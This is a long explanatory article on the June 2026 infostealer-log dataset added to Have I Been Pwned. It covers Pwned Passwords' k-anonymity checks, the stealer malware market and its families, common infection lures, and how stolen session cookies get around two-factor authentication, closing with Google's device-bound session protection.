124 million passwords just landed in Have I Been Pwned, and no company lost them

124 million passwords just landed in Have I Been Pwned, and no company lost them

On 15 June 2026, the breach-notification service Have I Been Pwned took in a corpus of 56.3 million unique email addresses and 124 million unique passwords, pulled out of hundreds of millions of individual stealer-log records. Troy Hunt, who runs the service, logged the entry under a deliberately flat name: June 2026 Stealer Logs. The passwords were folded into Pwned Passwords, the companion database that lets anyone check whether a given password has already turned up in a known compromise. Around 86% of the email addresses had been seen in HIBP before, carried over from earlier incidents, which leaves a smaller slice of first-seen addresses and a blunt reminder that the same stolen data keeps recirculating through the criminal supply chain.

Table of Contents

The credentials in this dataset were stolen one device at a time

The detail that makes this entry worth a closer look is its origin. Most records in HIBP trace back to a single event with a clear victim organisation. A company is attacked, an internal database is copied, and the personal records of everyone inside that database spill out together. Ashley Madison, Dropbox, LinkedIn, Adobe: each is a named breach of a named service, and the people exposed share one thing, which is that they all had accounts on that platform. This dataset works the other way around. The credentials were not lifted from one company’s servers. They were taken directly from the personal computers and devices of the people who own them, one infected machine at a time, by malware quietly recording what its victims typed.

That distinction changes who is at fault, who can fix it, and how the exposure plays out. When a service is breached, the operator carries the burden. The company must disclose, reset credentials, and absorb the regulatory and reputational damage, while affected users are mostly passengers. With a stealer-log corpus, there is no central operator to blame and no single password reset that closes the hole. The compromise sits on the victim’s own device. Their browser, their saved logins, their session tokens. If the malware is still running, changing a password simply hands the attacker the new one as soon as it is typed.

Hunt has loaded several of these stealer corpora over the past two years, and the June 2026 set fits a pattern he has described repeatedly. These are not tidy, one-time breaches. They are aggregations, assembled by people who scrape Telegram channels, dark-web forums and Tor marketplaces where infostealer output is traded and dumped. The “hundreds of millions of records” figure refers to raw rows. After normalising and deduplicating that flood, what survived as distinct items was 56.3 million email addresses and 124 million passwords. Those are the numbers that matter, because raw row counts in this corner of the internet are almost always inflated by duplication.

For an individual, the practical takeaway is narrow and concrete. If your email address appears in the June 2026 stealer logs, the realistic assumption is that one of your devices was infected at some point, and that the passwords saved in your browser at the time are now in criminal hands. That is a heavier conclusion than “a website I used got hacked.” It points at the machine in front of you rather than at a distant company, and it raises the possibility that the same malware also grabbed session cookies, autofill data and authentication tokens that a password change alone will not neutralise.

The data also sits inside a noisy month. Around the same window, security researchers reported a separate trove of roughly 24 billion records sitting on an exposed, unsecured database, much of it infostealer output enriched with vulnerability data to help attackers prioritise targets. The two events are not the same, and conflating them is exactly the kind of mistake that produces misleading “16 billion passwords leaked” headlines. What HIBP added on 15 June is a specific, deduplicated, checkable corpus. The broader point both events make together is that credential theft has shifted decisively from breaking into companies toward harvesting individuals, and the volume now moving through that channel is large enough that most regular internet users have at least one credential somewhere in it.

This article works through what that shift means in detail: what a stealer log actually holds, how the malware gets onto a machine, why saved browser passwords and session cookies are the prize, how the stolen data is priced and sold, what the numbers do and do not prove, and what an individual or an organisation can realistically do once the credentials are already out.

Inside a single stealer log

A stealer log is the output file a piece of information-stealing malware produces after it has finished going through an infected machine. It is not a hacking tool in the cinematic sense. It is closer to an automated clerk that opens every drawer on a computer, copies anything that looks like a credential, and ships the bundle back to whoever deployed it. To understand the June 2026 dataset, it helps to picture what one of these logs contains for a single victim.

At the centre are saved browser credentials: the email addresses, usernames and passwords stored in Chrome, Edge, Firefox or any Chromium-based browser, each one paired with the website it unlocks. This pairing is what gives stealer logs their edge over older credential dumps. A traditional combo list might tell an attacker that the password “Summer2024!” belongs to a given email address. A stealer log tells them that the same password was entered at a specific bank, a specific email provider and a specific work portal, because the malware recorded the URL alongside the credential. That removes the guesswork. The criminal does not have to spray the password across the internet hoping for a hit. They already know where it works.

Around that core sits a wider haul. Modern stealers routinely grab browser cookies and active session tokens, autofill data, saved payment-card details, cryptocurrency wallet files, and the seed values used by some authenticator apps. They fingerprint the machine: the operating system, hardware identifiers, installed software, the victim’s country, the IP address. One analysis of tens of millions of these packages in 2025 found that the vast majority contained active passwords and that almost all of them recorded the exact URLs where credentials were used, alongside hardware IDs, email addresses, VPN configurations, SSH keys and cloud tokens. A single log is, in effect, a complete portrait of a person’s digital life at the moment of infection.

The cookies deserve particular attention, because they are the element that turns a password leak into something more dangerous. A session cookie is the small token a website hands your browser after you log in, so that you do not have to re-authenticate on every page. If a stealer captures a live session cookie, an attacker can import it into their own browser and step straight into the victim’s authenticated session, often without needing the password at all and without triggering a second-factor prompt. That is why security teams treat stealer logs as more severe than ordinary breach data. The log can carry the keys, the address, and a pass that lets the holder skip the lock entirely.

There is a structure to how these logs look in the wild. Many carry the branding of the malware that produced them, with the family’s logo stamped at the top of the information file, which is why researchers can often identify whether a given log came from RedLine, StealC or another tool. Each log is typically saved with a country code and a hardware identifier for the infected device, then bundled into archives that get passed around in channels and marketplaces. A single batch traded on Telegram can run to tens of gigabytes and contain logs from a great many separate victims, which is how “hundreds of millions of records” accumulate.

The mental shift that matters most is this. A stealer log is evidence that a specific person’s device was compromised, not that a specific company was. When your address appears in a corpus like the June 2026 set, the most accurate reading is not “one of the sites I use leaked my data.” It is “at some point, malware ran on a machine I was using, and it copied whatever I had saved.” That is a more uncomfortable thought, and it points the remediation effort somewhere most people never look: at their own endpoint, the device itself, rather than at the long list of online services they hold accounts with.

The line between a corporate breach and an infected laptop

The reason this dataset reads differently from a routine breach notification comes down to a single question: whose failure put the data there. In the breach model that most people carry in their heads, the failure belongs to a company. An attacker finds a way into a corporate network or a misconfigured cloud bucket, copies a customer database, and the people in that database are exposed through no action of their own. The remedy is institutional. The company resets passwords, notifies regulators, offers credit monitoring, and the affected users wait for instructions. Responsibility and repair both sit on the organisation’s side of the line.

Stealer logs collapse that arrangement. The point of compromise is the victim’s own device, and the data exposed is whatever that person had saved across every service at once, not the records held by any one provider. There is no breached company to disclose, no central reset that fixes the problem, and no regulator with a clear party to penalise. The malware does not care which sites the victim uses; it takes everything in the browser and everything it can reach on the disk. A single infection can therefore expose a banking login, a work email, a gaming account and a healthcare portal in the same file, because all of those credentials lived in the same browser profile.

This is why a stealer-log corpus tends to be broader and more intimate than a single-service breach of the same headline size. A breach of a retailer exposes the people who shopped at that retailer, and usually a defined set of fields: name, email, maybe a hashed password and an address. A stealer log exposes the full credential set of each infected person, drawn from dozens of unrelated services, with plaintext passwords and the exact URLs attached. One stolen log can be more useful to an attacker than a million records from a typical breach, because it is pre-sorted, plaintext, and tells the criminal precisely where each credential works.

It also reframes the meaning of strong security hygiene at the service level. A company can do everything right, hash its passwords properly, enforce two-factor authentication, run a clean infrastructure, and still see its users’ accounts taken over, because the credentials were never stolen from the company. They were stolen from the user’s infected machine before they ever reached the company’s login page. The Verizon Data Breach Investigations Report has been blunt about this dynamic, noting that organisations cannot guarantee their customers are free of infostealers, since there is no way to force a customer to patch their operating system or run antivirus. The recommended posture is to assume some fraction of any user base is already compromised at the endpoint and to design access controls accordingly.

There is a second-order effect on attribution that matters for anyone trying to interpret the news. When a stealer-log dataset surfaces, it is common to see panicked reports framing it as a breach of a major provider, because the logs contain credentials for that provider’s domain. In October 2025, a wave of coverage claimed a mass “Gmail breach” affecting millions, when the underlying reality was that infostealer logs naturally contain Gmail credentials, since Gmail is one of the most widely used services on earth. Google pushed back directly, explaining that the alarm came from a misreading of credential-theft database updates rather than any single attack on its systems. The presence of a domain in a stealer corpus says the domain’s users were infected, not that the domain was hacked. That is a distinction the headlines routinely lose, and losing it sends people chasing the wrong fix.

The honest framing of the June 2026 dataset is therefore narrower and more useful than “124 million passwords leaked.” It is a deduplicated aggregation of credentials harvested from a very large number of individually infected devices, made checkable so that victims can learn their exposure and act on it. The fault did not sit with a company. It sat, in each case, with a compromised endpoint, and that is where the meaningful response has to begin.

Have I Been Pwned and the engineer who built it

Have I Been Pwned exists because one person kept noticing the same problem. Troy Hunt, an Australian security developer and a former Microsoft Regional Director and MVP, built the site in late 2013 after the Adobe breach exposed tens of millions of customer accounts. He had been doing post-breach analysis of leaked credentials and kept finding the same email addresses turning up across multiple incidents, frequently with the same passwords, which meant a single exposed credential could unlock a string of unrelated accounts. The site started as a free, deliberately simple way for anyone to check whether their email address appeared in known breaches, and it grew from there.

More than a decade on, the service has loaded over a thousand distinct breaches and tracks well over fifteen billion compromised accounts. It has become part of the plumbing of consumer security rather than a niche curiosity. Browsers, password managers and identity platforms query its data behind the scenes; national computer emergency response teams in dozens of countries use its free government service to monitor their own official domains against new breaches, with more than forty governments onboarded. The model has stayed close to its origins: free for individuals to check their own exposure, with paid API tiers for organisations that need to monitor domains at scale, and the running costs carried in large part by infrastructure partners.

What gives HIBP its authority is not size alone but the verification discipline behind each load. Hunt does not simply ingest any file handed to him and publish it. Before a dataset goes live, he tries to confirm it is real and not a recycled compilation masquerading as something new. A recurring step is to take a sample of the email addresses and run them against the existing HIBP corpus to see how many have been seen before. A very high crossover, in the high eighties or low nineties as a percentage, is a signal that the data is largely old material repackaged. He also contacts a handful of affected subscribers and asks them to confirm whether the exposed passwords were ones they actually used, including whether they were current or long retired. Only when the data checks out does it get loaded, and that gatekeeping is a large part of why a HIBP entry carries more weight than a sensational forum post claiming billions of new records.

The stealer-log work specifically has pushed the service into new territory. Loading credentials harvested from infected devices raised a practical problem: people who found their address in a stealer corpus had no way to learn which site the credential was taken from or which password was affected, which made the notification frustrating and hard to act on. In response, HIBP built features that let verified users see the specific domains their address appeared against in the logs, and let domain owners query the stealer data for their own users through an API. That turned a vague “you appear in some stealer logs” alert into actionable detail: this address showed up against these sites, so rotate those credentials.

It is worth being clear-eyed about the limits, because Hunt himself is. HIBP does not contain every stolen credential in the world, and an absence from its database is not a clean bill of health. The service can only index data that reaches it and that it can verify. Plenty of stealer output never makes it into a public channel, sits in private paid groups, or is held by criminals who have no reason to dump it. A negative result means your address has not turned up in the breaches and corpora HIBP has loaded, not that your credentials are safe. The service is a powerful early-warning system and a genuine public good, but it is one signal among several, and treating it as the definitive verdict on personal exposure overstates what any single database can do.

Pwned Passwords and the k-anonymity trick behind safe checking

The 124 million passwords from the June 2026 corpus went into Pwned Passwords, a part of HIBP that deserves its own explanation because it solves a problem most people never think about. Checking whether a password has been compromised sounds simple, but doing it without creating a new risk is genuinely hard. If you send your password to a server to ask “has this leaked?”, you have just handed your live password to a third party. Even sending a full hash is risky, because a determined operator could crack common hashes or log them. The whole point is undermined if the check itself leaks the secret.

Pwned Passwords gets around this with a method called k-anonymity, an idea contributed by Junade Ali while at Cloudflare. The mechanism is elegant. Your software hashes the password locally using SHA-1, then sends only the first five characters of that hash to the API. The server responds with every hash suffix it holds that begins with those five characters, along with a count of how many times each appeared in breaches. Your software then checks, locally, whether the remaining part of your hash is anywhere in that list. The full password never leaves your device, and neither does its full hash. The server only ever sees a five-character prefix that could belong to hundreds of different passwords, so it cannot know which one you were actually checking.

The numbers behind this are reassuring. Splitting hashes by a five-character prefix produces just over a million possible buckets, and each bucket on a half-billion-password dataset returns several hundred suffixes on average, enough collisions that the prefix tells an eavesdropper essentially nothing about the source password. The use of SHA-1 here often draws objections from people who know it is cryptographically broken for collision resistance, but those objections miss the purpose. SHA-1 is not protecting the password here; it is a fast, uniform way to bucket the data and to obscure any malformed input that slipped into the corpus. The anonymity comes from the prefix model, not from the strength of the hash.

The scale at which this now operates is striking. Pwned Passwords handles enormous query volumes, well into the billions of requests per month, delivered through Cloudflare’s global edge network with a cache-hit ratio above 99.9% across hundreds of edge locations in well over a hundred countries. During one thirty-day window in late 2025, the service served more than seventeen billion requests, averaging thousands per second with peaks tens of thousands higher in any given minute. A check that started as a niche developer tool is now baked into browsers, password managers and sign-up forms across the internet, quietly screening passwords against known-bad lists at a rate that would have seemed absurd a few years ago.

This matters because it operationalises a recommendation that security standards bodies have been making for years. The United States National Institute of Standards and Technology, in its digital identity guidance, advises that when someone sets or changes a password, the service should check it against lists of values known to be commonly used, expected or compromised, and refuse the ones that appear. Pwned Passwords is the most widely used way to put that advice into practice without building and maintaining a breach corpus yourself. A service can call the k-anonymity API at the moment a user picks a password and block anything already known to be exposed, which closes off the single most exploited weakness in password security: people choosing passwords that are already in the attackers’ dictionaries.

For the June 2026 dataset, the practical effect is immediate. Any password from those 124 million is now flagged the instant it is checked, whether by an individual using the website, a password manager auditing a vault, or a service screening new sign-ups. A password that appears in Pwned Passwords should be treated as burned. Not “probably fine because the breach was old,” not “acceptable because it is long and complex,” but burned, because its appearance in the corpus means it is sitting in a list that attackers feed into automated login attempts. The strength of the password is irrelevant once it is known. A long, random, genuinely strong password that has leaked is more dangerous than a mediocre one that has not, because the attacker no longer has to guess it.

There is a quieter benefit worth noting. Because the data also flows from sources such as a feed of newly seen passwords supplied by the FBI, Pwned Passwords keeps absorbing fresh material rather than freezing at a single snapshot. That keeps the screening current, so a password that becomes compromised this month can be caught soon after, rather than only being recognised years later when some historical dump finally surfaces.

Reading the 124 million figure without the hype

Large round numbers in breach coverage invite a specific kind of misreading, and the June 2026 dataset is a good case study in how to interpret them honestly. The headline is 124 million passwords. The first thing to be precise about is what that count actually is. It is 124 million unique passwords, deduplicated from hundreds of millions of raw stealer-log rows, added to the Pwned Passwords database. It is not 124 million people, and it is not 124 million accounts. The companion figure, 56.3 million unique email addresses, is closer to a count of affected identities, though even that overstates distinct humans because one person often appears under several addresses.

The second point of precision concerns the word “new.” A dataset can be new to HIBP without the credentials inside it being freshly stolen. Hunt has made this point so often it has become a refrain: “new to HIBP” does not mean “a brand-new breach.” Stealer logs in particular are recirculated endlessly, merged, repackaged and redumped across channels, so a corpus that lands today can be largely composed of material that has been in criminal hands for months or years. The crossover statistic for the June 2026 set, with around 86% of the email addresses already present in HIBP, is direct evidence of exactly this. The genuinely first-seen portion is real and worth knowing about, but it is a fraction of the headline, not the whole of it.

Recent large credential datasets added to Have I Been Pwned

DatasetAddedUnique emailsPasswords to Pwned PasswordsOrigin
Stealer Logs (Jan 2025)Jan 202571M106MInfostealer logs, Telegram
ALIEN TXTBASEFeb 2025284M244M newInfostealer logs, Telegram
Synthient Stealer LogOct 2025183Mpart of corpusInfostealer logs, aggregated
Synthient Credential StuffingNov 2025~2,000M~1,300MRecycled breach combo lists
June 2026 Stealer LogsJun 202656.3M124MInfostealer logs, aggregated

These figures show how much credential data has moved through HIBP in eighteen months and how the origin type splits between live infostealer output and recycled combo lists. The deduplicated unique counts, not the raw row counts, are the meaningful measure.

The third point is comparison. Set against the other entries of the past year and a half, the June 2026 set is sizeable but far from the largest. The ALIEN TXTBASE corpus in February 2025 carried 284 million unique addresses across some 23 billion rows and added 244 million previously unseen passwords. The Synthient credential-stuffing dataset in November 2025 reached nearly two billion unique addresses and around 1.3 billion passwords. Against that backdrop, 124 million passwords is a serious but routine entry, not an unprecedented event, which is precisely why sober coverage matters more than alarm.

None of this is meant to minimise the dataset. The deflationary points about counts and novelty are not reasons to ignore it. They are the opposite: they tell you that the real risk is structural rather than tied to this one corpus. The credentials in the June 2026 set sit inside a continuous stream of stolen logins that keeps flowing regardless of which particular batch happens to be loaded this week. If your address is in this one, it may well be in others, and the meaningful question is not “how big was this specific dataset” but “is my credential reuse and my device hygiene leaving me exposed to the whole stream.” The number is a prompt to check and act, not a measure of how worried to be on any given day.

The infostealer as a business rather than a one-off hack

The instinct to picture a hacker behind every breach gets in the way of understanding stealer logs, because the people who built the malware are usually not the people who use it, and neither group is doing anything that resembles a targeted attack. The infostealer world runs as a commercial market with the structure of a software business. Developers write and maintain the malware, then rent it out as a subscription product, complete with management panels, customer support, regular feature updates and tiered pricing. The industry term for this is malware-as-a-service, and it has turned credential theft from a specialist craft into something a low-skilled criminal can buy off the shelf.

The pricing makes the point. A leading stealer has typically been offered at a few hundred dollars a month for the standard package, scaling up to roughly a thousand dollars for premium builds with stronger evasion, and in some cases a flat five-figure payment for source-code access and the right to resell. Newer entrants have undercut the established names, with commercial stealers appearing through 2025 at prices from under a hundred dollars to a few hundred per month. For the cost of a mid-range phone, a buyer gets working malware, a dashboard to track their infections, and tools to organise and sell the stolen data. That accessibility, more than any single technical breakthrough, is why the volume of stolen credentials has climbed so steeply.

The market has its own division of labour, which researchers who monitor it have mapped in detail. At the top sit the developers and primary sellers, who run the malware and operate public channels advertising it alongside private paid groups for clients. Below them are aggregators, who collect logs from many sources and republish them, often to build a reputation or draw attention to a paid service. Then come the traffers, who do not sell logs themselves but specialise in spreading the malware, driving traffic to malicious downloads in cooperation with the sellers and taking a cut of what they harvest. Telegram sits at the centre of all of it, functioning as the marketplace, the distribution channel and the dumping ground at once; monitoring of the ecosystem found single Telegram accounts capable of ingesting tens of millions of credentials in a single day.

This structure explains why takedowns, however real, do not end the problem. When law enforcement disrupts one family, the demand for stolen logins does not disappear, and a market that lets a new brand launch for a few hundred dollars simply routes around the gap. Cheaper rivals are already advertising before the dust settles. Each disruption raises costs and buys defenders time, but it does not retire the business model, because the economics keep pulling new suppliers in. Stolen credentials hold their value for months and can be resold repeatedly, which gives infostealers a return on investment that other categories of malware struggle to match. Ransomware needs negotiation; cryptojacking yields pennies; an infostealer produces reusable, resellable access.

The data flow that ends in a HIBP load is therefore the tail end of a long commercial pipeline. A traffer lures a victim into running a malicious file. The stealer harvests the device and sends the log back to the operator. The operator sells or dumps it, possibly several times over, on Telegram and in marketplaces. Aggregators scoop it up, merge it with other batches, and recirculate it. A threat-intelligence researcher monitoring those channels collects the aggregated output, deduplicates it, and eventually shares a cleaned corpus with a service like HIBP. By the time a dataset becomes checkable, the criminals have usually had months to exploit it, which is one reason a notification can feel like old news even when the load is recent.

Understanding the market also reframes who the victims are. Because the malware is sprayed indiscriminately by traffers chasing volume, infection is rarely personal. The people in the June 2026 corpus were almost never singled out. They downloaded the wrong installer, clicked the wrong link, or ran a cracked program, and the malware took whatever it found. That randomness is small comfort, but it does shape the right response. The threat is environmental, not adversarial, which means the defence is about reducing the chance of infection and limiting the blast radius when it happens, rather than about outsmarting a specific attacker who has chosen you.

Malware families feeding the logs

HIBP did not name the specific malware behind the June 2026 corpus, and that reticence is normal. Aggregated stealer datasets are assembled from many sources and many families at once, so attributing a deduplicated blend to a single tool would be misleading. What can be said is which families have dominated the market that produces these logs, because the corpus is the combined exhaust of that market rather than the work of one program.

For much of 2024 and into 2025, Lumma, also known as LummaC2, was the most prolific stealer in circulation. It spread heavily through game cheats and cracked software, used anti-sandbox tricks including a method that watches cursor movement to detect whether it is running in front of a real human, and was sold through the tiered subscription model that has become standard. Its reach was large enough that Microsoft’s Digital Crimes Unit, working with Europol, the FBI and the United States Department of Justice, ran a coordinated disruption in May 2025, sinkholing close to 394,000 infected hosts and seizing around 2,300 domains. The operation worked, in the sense that it knocked Lumma’s infrastructure offline, and it did not work, in the sense that the malware recovered within weeks as new command-and-control endpoints appeared. By early 2026 it was back at scale.

The takedown story repeats across the category. RedLine, which held a top-three position for years and was famous for the logos it stamped on its log files, was the target of Operation Magnus in October 2024 and declined afterward, though its old logs keep circulating and remain a live credential threat. Through 2025, multiple phases of Operation Endgame targeted the infrastructure behind LummaC2 and Rhadamanthys, with results that by the end of the year appeared to have meaningfully cut their operations. Every disruption clears space, and a successor fills it. When RedLine fell, the field reshuffled toward Lumma; when Lumma was hit, rivals such as Vidar and StealC absorbed the displaced demand.

The current top tier reflects that churn. As of early 2026, the most actively distributed families included LummaC2, ACRStealer, StealC and Vidar, according to malware-trend tracking. StealC has risen sharply on the strength of an aggressive release cadence, pushing new features frequently, offering free testing periods and unusually responsive support on criminal forums, and shipping a second major version in 2025 that added encrypted command-and-control and quieter behaviour designed to slip past endpoint detection. Vidar, one of the more veteran families and a known successor to older malware, was rewritten for stealth in 2025 and is notable for its abuse of legitimate platforms such as Telegram and social-media services to host its configuration and exfiltration, which helps it blend into ordinary network traffic. It was also among the first stealers to target two-factor authentication seed values.

The market is not limited to Windows, and this is a point many users get wrong. macOS now has its own active stealer families, including Atomic, Poseidon, Odyssey and MacSync, several of which spread through the same paste-and-run lures used against Windows. One macOS-only stealer was offered with licences in the low thousands of dollars, priced as a premium product precisely because Apple users skew toward higher-value targets such as developers and executives. The belief that a Mac is inherently safe from this category is outdated; the volume is lower than on Windows, but the threat is real and growing.

What ties the families together is consistency of purpose despite cosmetic differences. Each targets browser credential stores, cookies, autofill data, cryptocurrency wallets and authentication artefacts. Each is sold as a service. Each is distributed through whatever lure is converting at the moment. The specific brand behind any given log matters far less than the fact that the whole market is engineered around one goal: scooping saved credentials off ordinary machines and turning them into a sellable commodity. The June 2026 dataset is what that goal looks like at scale, expressed as a single deduplicated file.

Infection usually starts with a click, not a break-in

The mental image of malware sneaking through some hidden flaw in your system is mostly wrong for this category. Infostealers overwhelmingly get onto a machine because the person at the keyboard runs something they should not have. The delivery is social, not technical, and the lures are tuned to the moments when people lower their guard. Understanding those moments is the single most useful piece of prevention, because the infection is almost always invited in.

The most prominent technique of 2025 went by several names: ClickFix, FakeCAPTCHA, or simply paste-and-run. The victim lands on a page that presents what looks like a routine verification step or an error to fix, and is instructed to copy a snippet of text and paste it into a system dialog such as the Windows Run box or a terminal. The snippet is a command that quietly downloads and executes a loader, which then drops the stealer. It works because it weaponises the user’s own willingness to follow instructions, and because the action happens outside the browser’s protections, in a system prompt the browser cannot police. The bulk of attempted delivery for the dominant stealer of the period leaned on exactly this kind of copy-and-paste manipulation.

The older routes remain busy. Cracked software and game cheats are a perennial favourite, because someone who has decided to run an unlicensed, unsigned executable from an untrusted source has already accepted the exact risk the malware needs. Pirated applications, key generators, and “free” versions of paid tools are ideal carriers. So are fake installers and updates: a page mimicking a legitimate download for a popular application, or a pop-up claiming a browser or media plugin needs updating, delivering the stealer instead of the real thing. Malvertising sits alongside these, planting malicious ads that lead to poisoned downloads, sometimes on sites that are themselves entirely reputable.

Phishing in the traditional sense still feeds the pipeline, with malicious attachments and links arriving by email, though the trend has been toward lures that do not require an obvious attachment at all. The through-line is that the victim performs the install themselves, usually believing they are doing something ordinary: watching a video, fixing a glitch, getting a tool they wanted, proving they are human. That is what makes infostealers so hard to stamp out at the source. There is no exotic exploit to patch. There is a steady supply of people who will, in a moment of haste or temptation, run the wrong file.

Two facts about the victim population sharpen the picture. The first is that infection produces almost no visible symptoms. A stealer is designed to run once, grab what it can, exfiltrate it, and often delete itself, all within seconds or minutes. There is no ransom note, no slowdown, no obvious sign. Most victims never learn they were hit until their credentials surface in a dataset like the June 2026 corpus, sometimes years later. The second is that having security software installed is not the protection people assume it to be. Research into compromised devices found that a large majority of malware infections happened on machines that had antivirus or endpoint protection running, because evasion is a core feature of the malware and because the user willingly executing the payload bypasses many defences.

The geography of infection is also broader than the corporate-versus-personal split implies, which is why the credentials in these logs reach into workplaces as readily as homes. A person who uses one laptop for personal browsing and occasional work, with both sets of credentials saved in the same browser, hands an attacker both in a single log. The boundary between “my device” and “my employer’s exposure” runs straight through that shared browser profile, and the malware does not respect it.

The practical lesson is unglamorous but reliable. The behaviours that prevent stealer infections are the ones people already know and skip: do not run cracked software, do not paste commands you do not understand into system dialogs, do not trust update prompts that appear from nowhere, and treat unexpected “verify yourself” steps with suspicion. None of that requires technical sophistication. It requires resisting the specific moments of convenience and curiosity that the lures are built to exploit, which is harder than it sounds precisely because the malware authors have spent years refining those moments.

Browsers turned into the softest target

The browser is where modern infostealers do most of their work, and that is not an accident. Over the past decade, the browser has quietly become the place where people keep the keys to their entire digital life. Saved passwords, autofilled addresses and payment cards, active login sessions for email and banking and work tools, browsing history, and increasingly the credentials for cloud consoles and developer platforms all live inside the browser profile. A tool that can read a browser profile can read most of what matters about a person, which is exactly why stealers are built to target browser data first.

The convenience that makes this possible is the convenience users were encouraged to adopt. Browsers offered to remember passwords, and people accepted, because typing a unique strong password on every login is impractical and the browser made it painless. The trade-off, rarely spelled out, is that saved credentials have to be stored in a form the browser can retrieve and use, which means they have to be decryptable on the device. On Windows, browser password stores were historically protected by the operating system’s data-protection mechanisms tied to the user account, which sounds secure but means that any program running as that user, including malware the user has just executed, can decrypt the saved passwords. The protection guards against another user on the same machine, not against code running in the victim’s own session.

Google moved to close part of this gap. In July 2024, Chrome introduced application-bound encryption on Windows, designed to tie the encryption of sensitive data such as cookies to the Chrome application itself, so that an arbitrary program running as the user could no longer simply read it. The effect was immediate but temporary. Several stealer families paused their distribution while they worked out how to defeat the new protection, and within months they had bypassed it, with maintainers of multiple families claiming and then demonstrating the ability to exfiltrate cookies from the newest Chrome versions; researchers independently confirmed a working bypass in at least one open-source stealer. The cat-and-mouse pattern is the norm: a defence raises the cost, the market adapts, and the data keeps flowing.

The breadth of what gets taken from the browser is what makes a single infection so damaging. It is not just passwords. The malware harvests the cookies that represent active sessions, the autofill store with names and addresses and sometimes card details, and the saved credentials for every site the victim ever told the browser to remember. Because the browser pairs each saved credential with its site, the resulting log is pre-indexed by service, which is why these logs are so much more useful than undifferentiated dumps. The attacker does not receive a pile of passwords; they receive a directory of which password opens which door.

This concentration of value in the browser also reshapes the advice that follows. The habit of letting the browser remember everything, including high-stakes logins for banking, email and work, is the habit that turns a brief infection into a total compromise. The safer pattern separates the credential store from the browser entirely, keeping passwords in a dedicated manager that does not expose the whole vault to any program running in the user’s session, and reserving the browser’s own password memory for low-stakes accounts where the consequences of exposure are minor. That separation does not make infection impossible, but it changes what a stealer can grab in the seconds it runs.

The deeper issue is architectural, and it points toward the later sections of this analysis. As long as authentication depends on a secret that must be stored on the device in a usable form, a tool that controls the device can steal that secret. Browser hardening like application-bound encryption raises the bar, and device-bound session protections raise it further, but they are mitigations layered onto a model whose core assumption, that a stored, replayable secret is a safe way to prove identity, is exactly what infostealers exploit. The browser is the softest target because it is where the replayable secrets pile up, and the long-term fix is to stop relying on replayable secrets at all.

Stolen session cookies and the quiet defeat of two-factor authentication

The most underrated part of a stealer log is not the passwords; it is the cookies. To see why, it helps to understand what a session cookie does. When you log in to a website and clear any second-factor check, the site hands your browser a token that says, in effect, “this person already proved who they are, let them through without asking again.” That token, the session cookie, is what keeps you logged in as you move around the site and across visits. It exists precisely so you do not have to re-authenticate constantly. It is a portable proof of an authenticated session, and if someone else holds it, the site treats them as you.

This is the mechanism that lets stealers walk straight past two-factor authentication. Multi-factor authentication protects the act of logging in. It makes the initial authentication harder by requiring something beyond the password: a code, a prompt, a key. But the session cookie is issued after all of that is done. An attacker who steals a live session cookie does not need the password and does not face the second factor, because the cookie represents a session that has already cleared both. They import the cookie into their own browser, and the site, seeing a valid session token, grants access with no prompt and no challenge. The careful second factor the victim set up never enters the picture.

This technique has become the dominant route around MFA, and the scale is substantial. Analysis of tens of millions of stealer packages in 2025 found a sharp year-on-year rise in volume and confirmed that these packages are dangerous specifically because they carry live session cookies capable of bypassing MFA entirely; the vast majority also contained active passwords and recorded the exact sites where they were used. Older infections harvested large numbers of cookies per device, with averages well into the thousands, each one a potential foothold into an account that the victim believed a second factor had locked down. Business email compromise, cloud-account takeover and a long list of high-profile intrusions have run on stolen session cookies rather than stolen passwords.

The reason this matters so much for the June 2026 dataset is that it changes what a password change can accomplish. If your address is in the corpus, the standard advice is to change the exposed passwords, and that advice is correct as far as it goes. But if the same infection also captured your session cookies, those cookies may still be valid, and rotating the password does not necessarily invalidate them. An attacker holding a live cookie can remain inside an authenticated session even after you change the password, until the session naturally expires or you explicitly sign out of all sessions and force a global token reset. This is why proper remediation after a stealer infection includes invalidating active sessions, not just changing credentials, a step most people never take and most consumer services bury deep in their settings.

The corporate dimension is sharper still. The Verizon analysis is explicit that post-infection remediation has to include invalidating active session cookies, not merely resetting stolen credentials, if an organisation wants to actually stop an attacker who has exfiltrated session data. A help desk that resets a compromised user’s password and considers the matter closed may have done nothing about the cookie that is still letting the intruder act as that user. Treating cookie theft as a footnote to password theft is one of the most common and most costly mistakes in incident response.

There is a hard limit to how much the individual can do about this, which is part of why the problem persists. Most consumer services do not surface session management clearly, do not show you which devices and sessions are currently active, and do not make it easy to revoke them. The defences that genuinely blunt cookie theft are mostly server-side or platform-side: shorter session lifetimes, binding sessions to a device, and re-authentication for sensitive actions. The user’s only recourse is the blunt instrument of signing out everywhere and the preventive work of not getting infected in the first place. That asymmetry, where the most dangerous artefact in the log is also the one the victim can do least about, is exactly why the industry has started building technical answers into the browser itself.

Google’s device-bound answer and where it stops

The clearest attempt to neutralise cookie theft at a structural level arrived in April 2026, when Google made Device Bound Session Credentials, or DBSC, generally available to Windows users in Chrome 146. The idea is straightforward and aimed precisely at the weakness described above. Instead of issuing a session cookie that works anywhere it is presented, DBSC cryptographically binds the session to the specific device that created it, using hardware-backed security: the Trusted Platform Module on Windows and the Secure Enclave on macOS. The keys that prove the binding are generated by the security chip and cannot be exported from the machine.

The consequence is that a stolen cookie stops being useful on a different computer. If a stealer copies a DBSC-protected session and an attacker imports it into their own browser, the site can verify that the session is not running on the device it was bound to, and refuse it. The cookie becomes dead weight the moment it leaves the machine. Google reported that an earlier rollout in 2025 produced a marked reduction in session theft for protected sessions, and internal testing of the mechanism blocked the large majority of attempted cookie-theft scenarios. For the single most dangerous element of a stealer log, this is a genuine and well-aimed countermeasure.

The limits, though, are important, and Google has been reasonably clear about them. DBSC protects sessions. It does nothing for the passwords, the autofill data, the SSH keys, the cloud tokens or any of the other contents of a stealer log. A log stripped of usable cookies still hands the attacker a directory of plaintext credentials and the sites they unlock, which feeds credential stuffing and account takeover through the front door. The protection addresses the cookie-replay vector and leaves the rest of the harvest untouched.

The coverage is also partial in ways that matter for real-world impact. At launch, DBSC was a Windows-only feature in Chrome, with macOS support promised for a later release that had not yet been announced. It only works when the website implements the standard on its own servers, so a session is protected only if both the browser and the site support it. Google’s own services adopted it early, and major providers such as Microsoft are expected to follow, but coverage across the long tail of the web is far from universal, and will take years to fill in. A user can be running a DBSC-capable browser and still hold ordinary, stealable cookies for every site that has not implemented the standard.

